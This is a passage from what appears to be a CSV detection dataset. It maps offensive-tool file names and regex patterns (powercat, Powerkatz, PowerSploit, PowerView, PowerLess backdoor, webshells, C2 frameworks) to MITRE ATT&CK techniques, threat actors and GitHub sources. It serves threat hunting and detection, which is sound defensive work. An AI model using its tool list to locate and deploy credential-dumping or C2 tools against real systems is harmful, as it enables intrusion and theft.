- T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17355" "*\powercat.ps1*",".{0,1000}\\powercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","17356" "*\Powercat.ps1*",".{0,1000}\\Powercat\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","17357" "*\powercat-master\*",".{0,1000}\\powercat\-master\\.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","17358" "*\powerfun.ps1*",".{0,1000}\\powerfun\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","17359" "*\powerglot\*",".{0,1000}\\powerglot\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","17360" "*\powerkatz.dll*",".{0,1000}\\powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","17361" "*\powerkatz.dll*",".{0,1000}\\powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - 
T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","17362" "*\powerkatz_x64.dll*",".{0,1000}\\powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","17363" "*\powerkatz_x64.dll*",".{0,1000}\\powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","17364" "*\powerkatz_x86.dll*",".{0,1000}\\powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","17365" 
"*\powerkatz_x86.dll*",".{0,1000}\\powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","17366" "*\Powerless.cpp*",".{0,1000}\\Powerless\.cpp.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","N/A","N/A","10","4","N/A","N/A","N/A","N/A","17367" "*\Powerless.dll*",".{0,1000}\\Powerless\.dll.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","N/A","N/A","10","4","N/A","N/A","N/A","N/A","17368" "*\Powerless.exe*",".{0,1000}\\Powerless\.exe.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic 
Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","N/A","N/A","10","4","N/A","N/A","N/A","N/A","17369" "*\PowerLessCLR.pdb*",".{0,1000}\\PowerLessCLR\.pdb.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","N/A","N/A","10","4","N/A","N/A","N/A","N/A","17370" "*\PowerLurk.ps1*",".{0,1000}\\PowerLurk\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","17371" "*\PowerLurk-main*",".{0,1000}\\PowerLurk\-main.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","17372" "*\Powermad*",".{0,1000}\\Powermad.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","17373" "*\Powermad.ps1*",".{0,1000}\\Powermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege 
escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","17374" "*\PowerPick.exe*",".{0,1000}\\PowerPick\.exe.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17375" "*\PowerPick\SharpPick\*",".{0,1000}\\PowerPick\\SharpPick\\.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17376" "*\Powerpreter.psm1*",".{0,1000}\\Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17377" "*\PowerProxy.ps1*",".{0,1000}\\PowerProxy\.ps1.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","0","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","17378" 
"*\power-pwn\*",".{0,1000}\\power\-pwn\\.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","0","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","17379" "*\PowerRat.exe*",".{0,1000}\\PowerRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17380" "*\PowerShdll.exe*",".{0,1000}\\PowerShdll\.exe.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","17381" "*\PowershellKerberos*",".{0,1000}\\PowershellKerberos.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","17386" "*\PowerShellRunnerDll.h*",".{0,1000}\\PowerShellRunnerDll\.h.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","17387" "*\Powershell-Scripts-for-Hackers-and-Pentesters*",".{0,1000}\\Powershell\-Scripts\-for\-Hackers\-and\-Pentesters.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","17388" "*\PowerSploit*",".{0,1000}\\PowerSploit.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17389" "*\PowerTools.ps1*",".{0,1000}\\PowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - 
TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","17394" "*\PowerTools\PowerPick\*",".{0,1000}\\PowerTools\\PowerPick\\.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17395" "*\powerup.exe*",".{0,1000}\\powerup\.exe.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17396" "*\Powerup.exe*",".{0,1000}\\Powerup\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of 
runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","17397" "*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17398" "*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","17399" "*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17400" "*\PowerUp.ps1*",".{0,1000}\\PowerUp\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","17401" "*\Powerup.ps1*",".{0,1000}\\Powerup\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","17402" "*\PowerUpSQL.ps1*",".{0,1000}\\PowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 
- T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17403" "*\PowerUpSQL.ps1*",".{0,1000}\\PowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17404" "*\PowerView.cna*",".{0,1000}\\PowerView\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","17405" "*\PowerView.exe*",".{0,1000}\\PowerView\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat 
Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","17406" "*\Powerview.exe*",".{0,1000}\\Powerview\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","17407" "*\PowerView.Log*",".{0,1000}\\PowerView\.Log.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17408" "*\PowerView.Log*",".{0,1000}\\PowerView\.Log.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17409" 
"*\PowerView.ps1*",".{0,1000}\\PowerView\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 